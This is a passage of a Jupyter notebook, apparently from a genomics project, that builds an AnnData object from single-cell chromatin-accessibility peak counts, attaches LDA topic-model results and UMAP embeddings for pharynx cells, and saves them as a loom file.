ncols=ncols, figsize=(3.5*ncols,3*nrows))\nfor idx, topic in enumerate(numpy.arange(doctopic_peaks_frac.shape[1])):\n row_idx, col_idx = int(idx/ncols), int(idx%ncols)\n if nrows > 1 and ncols > 1:\n ax = axes[row_idx, col_idx]\n elif nrows > 1 or ncols > 1:\n ax = axes[idx]\n else:\n ax = axes\n s = ax.scatter(doctopic_peaks_umap2_res[:,0], \n doctopic_peaks_umap2_res[:,1],\n cmap='viridis',\n c=doctopic_peaks_frac[:,topic],\n s=2)\n ax.set_ylabel('UMAP2')\n ax.set_xlabel('UMAP1')\n ax.set_title('Topic {!s}'.format(topic))\n cbar = fig.colorbar(s, ax=ax)\n#cbar.ax.set_yticklabels(gene_names, fontsize=10)\nfig.tight_layout()", "_____no_output_____" ] ], [ [ "## Construct an AnnData object and save it in loom format", "_____no_output_____" ] ], [ [ "def add_lda_result_to_anndata_obj(anndata_obj, lda_base, lda_cellnames, lda_peak_bed):\n\n filt_cellnames = numpy.loadtxt(lda_cellnames, dtype=object)[:,0]\n filt_cellnames_set = set(filt_cellnames)\n filt_cellnames_map = [(True, idx, numpy.where(filt_cellnames == elt)[0][0])\n if elt in filt_cellnames_set else (False, idx, numpy.nan)\n for idx, elt in enumerate(anndata_obj.obs.index.values)]\n unfilt_cellnames_idx, filt_cellnames_idx = [list(idx_tuple) for idx_tuple in zip(*[(elt[1], elt[2]) for elt in filt_cellnames_map if elt[0] is True])]\n anndata_obj.obs['lda_cell'] = [elt[0] for elt in filt_cellnames_map]\n\n theta = numpy.loadtxt(lda_base + '.theta', delimiter=',', dtype=float)\n unfiltered_theta = numpy.ones((len(filt_cellnames_map), theta.shape[1])) * numpy.nan\n unfiltered_theta[unfilt_cellnames_idx] = theta[filt_cellnames_idx]\n anndata_obj.obsm['lda_theta'] = unfiltered_theta\n\n col_means = numpy.mean(theta.T, axis=0)\n theta_norm = theta.T - col_means\n l2_for_norm = (theta_norm ** 2).sum(axis=0).flatten() ** 0.5\n theta_norm /= l2_for_norm\n theta_norm = theta_norm.T\n unfiltered_theta_norm = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_theta_norm[unfilt_cellnames_idx] = 
theta_norm[filt_cellnames_idx]\n anndata_obj.obsm['lda_theta_norm'] = unfiltered_theta_norm\n\n doctopic = numpy.loadtxt(lda_base + '.docTopic', delimiter=',', dtype=float)\n unfiltered_doctopic = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_doctopic[unfilt_cellnames_idx] = doctopic[filt_cellnames_idx]\n anndata_obj.obsm['lda_doctopic'] = unfiltered_doctopic\n\n doctopic_frac = (doctopic.T/doctopic.sum(axis=1)).T\n unfiltered_doctopic_frac = numpy.ones(unfiltered_theta.shape) * numpy.nan\n unfiltered_doctopic_frac[unfilt_cellnames_idx] = doctopic_frac[filt_cellnames_idx]\n anndata_obj.obsm['lda_doctopic_frac'] = unfiltered_doctopic_frac\n\n filt_peaks = numpy.loadtxt(lda_peak_bed, dtype=object)\n filt_peaks_str = ['{!s}\\t{!s}\\t{!s}'.format(*filt_peaks[idx,:3])\n for idx in range(filt_peaks.shape[0])]\n filt_peaks_set = set(filt_peaks_str)\n unfilt_peaks_str = ['{!s}\\t{!s}\\t{!s}'.format(anndata_obj.var['chr'][idx],\n anndata_obj.var['start'][idx],\n anndata_obj.var['stop'][idx])\n for idx in range(anndata_obj.var.shape[0])]\n filt_peaks_map = [(True, idx, filt_peaks_str.index(elt))\n if elt in filt_peaks_set else (False, idx, numpy.nan)\n for idx, elt in enumerate(unfilt_peaks_str)]\n unfilt_peaks_idx, filt_peaks_idx = [list(idx_tuple) for idx_tuple in zip(*[(elt[1], elt[2]) for elt in filt_peaks_map if elt[0] is True])]\n anndata_obj.var['lda_peak'] = [elt[0] for elt in filt_peaks_map]\n\n phi = numpy.loadtxt(lda_base + '.phi', delimiter=',', dtype=float).T\n unfiltered_phi = numpy.ones((anndata_obj.var.shape[0], phi.shape[1])) * numpy.nan\n unfiltered_phi[unfilt_peaks_idx] = phi[filt_peaks_idx]\n anndata_obj.varm['lda_phi'] = unfiltered_phi\n\n wordtopic = numpy.loadtxt(lda_base + '.wordTopic', delimiter=',', dtype=float)\n unfiltered_wordtopic = numpy.ones(unfiltered_phi.shape) * numpy.nan\n unfiltered_wordtopic[unfilt_peaks_idx] = wordtopic[filt_peaks_idx]\n anndata_obj.varm['lda_wordtopic'] = unfiltered_wordtopic\n\n wordtopic_frac = 
(wordtopic.T/wordtopic.sum(axis=1)).T\n unfiltered_wordtopic_frac = numpy.ones(unfiltered_phi.shape) * numpy.nan\n unfiltered_wordtopic_frac[unfilt_peaks_idx] = wordtopic_frac[filt_peaks_idx]\n anndata_obj.varm['lda_wordtopic_frac'] = unfiltered_wordtopic_frac\n\n return\n\ndef read_in_bow(bow_path, cell_names_path, feature_info_path, gene_name_map=None):\n try:\n bow_data_sparse = numpy.loadtxt(bow_path, dtype=int, skiprows=3)\n except StopIteration:\n #probably NFS lag; just wait a few seconds and try again\n time.sleep(10)\n bow_data_sparse = numpy.loadtxt(bow_path, dtype=int, skiprows=3)\n open_func, open_mode = (gzip.open, 'rb') if bow_path.endswith('.gz') else (open, 'rb')\n with open_func(bow_path, open_mode) as lines_in:\n cellnum = int(lines_in.readline().decode().strip())\n featnum = int(lines_in.readline().decode().strip())\n bow_data = sps.csr_matrix((bow_data_sparse[:,2],\n (bow_data_sparse[:,0] - 1,\n bow_data_sparse[:,1] - 1)),\n shape=(cellnum, featnum))\n\n try:\n cell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n except StopIteration:\n time.sleep(10)\n cell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n\n try:\n feature_info_bed = numpy.loadtxt(feature_info_path, dtype=object)\n except StopIteration:\n time.sleep(10)\n feature_info_bed = numpy.loadtxt(feature_info_path, dtype=object)\n col_names = ['chr', 'start', 'stop', 'name', 'score', 'strand']\n num_cols = feature_info_bed.shape[1]\n if num_cols <= 6:\n col_names = col_names[:num_cols]\n else:\n col_names = col_names + list(numpy.arange(6, num_cols).astype(str))\n\n anndata_obj = anndata.AnnData(X=bow_data,\n obs=pandas.DataFrame(index=cell_names),\n var=pandas.DataFrame(data=feature_info_bed,\n columns=col_names))\n if gene_name_map is not None:\n gene_name_map = numpy.loadtxt(gene_name_map, delimiter='\\t', dtype=object)\n gene_name_map = dict([gene_name_map[idx] for idx in range(gene_name_map.shape[0])])\n anndata_obj.var['common_name'] = [gene_name_map.get(elt, 
elt) for elt in anndata_obj.var.name]\n\n return anndata_obj", "_____no_output_____" ], [ "#make and save anndata object\nimport anndata\nimport pandas\n\n#first, read in the original BOW data (the unfiltered data)\norig_peaktable_path = '../tissue_analysis/pharynx/pharynx_all_peaks.bow'\norig_cell_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.indextable.txt'\norig_peak_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.bed'\n\nanndata_obj = read_in_bow(orig_peaktable_path, orig_cell_names_path, orig_peak_names_path)\n\n#next, add the LDA results, taking into account that some of the cells/peaks were filtered out before running LDA\nlda_base = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode'\nlda_cellnames = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.indextable.txt'\nlda_peak_bed = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.extra_cols.bed'\nadd_lda_result_to_anndata_obj(anndata_obj, lda_base, lda_cellnames, lda_peak_bed)\n\nprint(anndata_obj)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/anndata/_core/anndata.py:21: FutureWarning: pandas.core.index is deprecated and will be removed in a future version. 
The public classes are available in the top-level namespace.\n from pandas.core.index import RangeIndex\nTransforming to str index.\n" ], [ "umap_to_add = numpy.zeros((anndata_obj.shape[0], doctopic_peaks_umap2_res.shape[1])) * numpy.nan\nanndata_idx = numpy.where(anndata_obj.obs.lda_cell)[0]\numap_idx = [numpy.where(cell_names == elt)[0][0] for elt in anndata_obj.obs[anndata_obj.obs.lda_cell].index.values]\numap_to_add[anndata_idx] = doctopic_peaks_umap2_res[umap_idx]\nprint(umap_to_add.shape)\nanndata_obj.obsm['umap2'] = umap_to_add\n\numap_to_add = numpy.zeros((anndata_obj.shape[0], doctopic_peaks_umap3_res.shape[1])) * numpy.nan\nanndata_idx = numpy.where(anndata_obj.obs.lda_cell)[0]\numap_idx = [numpy.where(cell_names == elt)[0][0] for elt in anndata_obj.obs[anndata_obj.obs.lda_cell].index.values]\numap_to_add[anndata_idx] = doctopic_peaks_umap3_res[umap_idx]\nprint(umap_to_add.shape)\nanndata_obj.obsm['umap3'] = umap_to_add", "(616, 2)\n(616, 3)\n" ], [ "anndata_obj.write_loom('../tissue_analysis/pharynx/primary_lda_results.loom', \n write_obsm_varm=True)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]